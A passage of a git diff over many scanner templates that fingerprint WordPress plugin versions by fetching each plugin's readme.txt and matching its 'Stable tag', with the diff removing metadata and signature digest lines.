'(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c6a30f9ac8edea8e220c3db332d8235d7627f3cc585a0d3896dd101c01be561c0221008588c560baec981ec21da80e3e27a1260b3ceae95ad319940b9dd0cf81bd02c5:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 8f639f0258..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008cc89e830a1b5ffccdd920f78079a34fc210ec94f77d79ab2dd7c754ca33864a02200d7ef6249e92a8fa1b6d812d201a6e8ff23554b2d674085c0d6ed17b3c8bcf65:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 1e2fafbcb6..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008c4fb0e1b50ac14e4510af4b00645e87aa723395346cbe12402b840b1109abbd022100c80a38369b7778a6ea5ef7c5761b8584904b4168d451939c93e0adddcf20ed0d:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 8a6e6dad10..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204b2d87aa60e8b9adc6341433333af8d0d931c913ef221f079146c95b704907e102206eae585c6feecacb24cf69070daafa163d0f6986abcf32248697490324255efe:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 24a9add1ae..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009012318906a337a5d392286bf226c1888245ff3d1952f6f74147c32d15d9628602203909bd87a7b72c17fb314832490b6b3a5b63e964925549ce286e9cc8685cfdc4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index c0531406a8..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e7367c11a66c65582c78bce8ab91e6f476c4cf1502265a2b587e8f27c353cb63022100f8eaa4e1c6c20ce5200e68ce9c0b0dcf7ef7d13ad964da2bd53cedd9317301bb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 8cafcff6d4..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022062b71b0dc9fc632cb0a44c10337ceef4b8ce86d568bc86516efb52449ac2e5ca0221009ade4932bf732d4f921a4af7b975581fa9a502c8f6c250c11414ec5bfa29a106:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 7b221dcbf6..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100efa7c9e71ef749d02e916be0df30c940be18887fe9efac22e0e0c2f22ed3131e022100e0e08c10e15815dac326c7037b3533713d5546ae9dea2338e6219793bcdbff64:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 6b9786006c..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100dc0b9e324a90f11fc37868410d10296e0d8da583bbd908dd9f83794ae984a24b022100fb0080f1919aa6e20f0ec954b6839589e799d17081376346f3968661fee5fd51:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 813510eab9..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/host-webfonts-local/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 480a0045304302200bc9908377f3ae71cc96da15bf9805ec49b295da7ee39e7fff3f55149196c56a021f6eca31cf66df607d0c22f3149d255a0688e74c3b87016a656578132956b114:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index dac31850d6..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206b58aa0862322fbc3e916aa16895cdb8a1a21fd36c2ea7a5b1308a86df5ac009022044203bb4f625a4a8eca64219fe21458bb98b2b04ab9ed60c9c8b57bd198248fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9d68af14e8..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210084eada1d76affea05fc6a566012871ab7ac39fe32d767443ff269586de3d7899022066cdff9208deec31e64536d942adeb8c0cd2d1704ba92c259e7ab63ff0ade52f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 3fbca3209c..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205d8e058d345a655a3691ef1d953365288376272c37de9aa97ccfec86c169074202202e06334921a1f2013a36f7acf6420c5541532ef92b1ba1de658a090d0727f498:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index df8e55582a..1778552d75 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203ba0f6970ac9e59b9bf934d9677aacc6f6126cda1db30113e18dc27cc27ed267022100b3965cbf2f19a568e91ff4984b597eb3bba7de9a3a149498d5a0163441f8d9e5:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 65095eb9f6..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ce8503b480029f809e0d4eb1775f3616fda3d949a21e36670ba688582ba8699d02200098f689c08e50db5c13133650f626e3bb67fffb02bd0e1c43821882cca43638:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 34c7bfc2c1..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204473824b0f510dc80f611dedba801b177fd34d7d11e09319f387eebd015dbd4902207e86d7f802737c211b49ae8d147b775498c2913e03294f118b37d14ae92b7940:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 4bcb395a3e..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/jetpack-boost/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200aad72e9919c07ddbd54b516097dd6d17bd40f7c848ccf98e905a9654471def202200652748eb8e180d28a5a474033fb1a71c33258dcf7dca409f5d5e5ff05988908:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 530d34fc88..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200f01a341a20b0d29bff1c91384f7fce0f2f7f036efb252b55067beb814d5da6b022100ae4a6f06b77923be111a2dbd422e9f755f103ddab16864a38984522f03cbba61:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 316f97471f..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e85b4061df0de5b10b818ca666c1de23becc338301e582fc6dce16c33453c79a02204470f7cd1bbac5110ba6025ff116e33fec506703642d1dbc8b5ab667e86a1ab2:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 1fb4d12f39..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022015c1f42ecd88a05f3673a97e59de782b1d9bf764e0355a6830b797a3a3e16ac1022100e62e6e320bd395ae8633c54b0fe89e0455b3d688ef230bd718b13d7246ecd589:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index d90c0e0bad..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100bdae94d7c673d70aa0a29f355c4933e2d20a4119a87e306e6a35c1299b20a5f1022028543d7a66790ee1aa95ccc64b10016dcbd41f4d138f25cc7eea14e3afa72fe4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index a63c8cbfed..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a80f9d2ae946e37b2d2c3c8e3cce2e6987418ac49eec409c6e1e0c58ee2ad2d70220395a5fdb35f493255187bb39837ee35b546b1582147d9640786daf7fd1a5c84f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 2780ea68bf..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205c38722f84ab903d3bfb78bd8ed10f7daa33a433f4cfb9a83e2804ce901ec3c50220521dce303f5f0cf03a941bbb49d3fb0f40fb425f274b06d88f1a69de5873ffd6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 7f7ad95c3e..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100acc898fad7e602ce48ce2363c488443bea4add3d98e76784877fa22608fb13a9022100a78596b48804683ac9220da4fc9cd3de787011ca6dc5a858fd3ed64ed57130ce:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index e0288eab43..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200da6673405eb31bcf04ea92090986d531ccc6dc0b3c06d815fb1b1fc44e402ff022031d88c5cb53f51ad105fa7eb6f0295cc607389ff2a6a00c98ed0de0082c723c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 3f73e8043b..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f3fd5eed798695e81e59941ef2105b783e94e6a91a6c9d903a1a2bad16f8c68f022008bc56b36a18b995107ff281f27db302e8156a5d520aec8e0348bece625e1230:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 6a9cf28f3d..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100cdebf5383cf581fe7ebcc6e1ffc214d3264aac50b8bbe3f83b808278a59bc4c00220262609a257d91db77c8df1e9972b4dffc6bcaaa3c26b10ab570f1d54fa88dc25:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 58750e60fc..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-wp/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220606c44db6eedd9dfd082830d4598fd558a35f87ca620723ba3fafcc5986a985902202a760b330ba2a800e58c7fe9180da4c5ffeaf9520fd934634a1cc923ca57bd81:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index dc8ce24c19..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203821ccb2c255faeeeaf0687c9e6ee8b6b4a1106ad17dafa06d8950646c286ddd02206b5a045f34b025bb2801989bc6323a31c29b1eadc3824129c4d4f79bfa3eed41:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index e83ee96494..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203d031eaf0a5205b89455305877112d5e1dd3ea0e9bd0ea5c1ba4b594ede9d8a6022023de5105da7ee747107d2c5724995fb213540e2dea106ae6db6753526380e8e4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 8cf86d449e..67f5eeae02 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c9c70dcfa45921a452c75b6a6b5b0561fc341b644c55f93e51aec54f1e2c1c63022079cb2c55dc082f5a8c21b976308209f2f05fe6421679b734f8cff0523b5cf004:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 7d2214fb00..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220125aa854d61bd5fa1bd1718225cd53be09635b4493f7a1b78efd4bca39209236022100b758e79c38c121ab3109127457fc07c02270b4bb9e7d815b7d41929d81963883:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e03f9360e9..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" @@ -47,5 +47,3 @@ http: part: 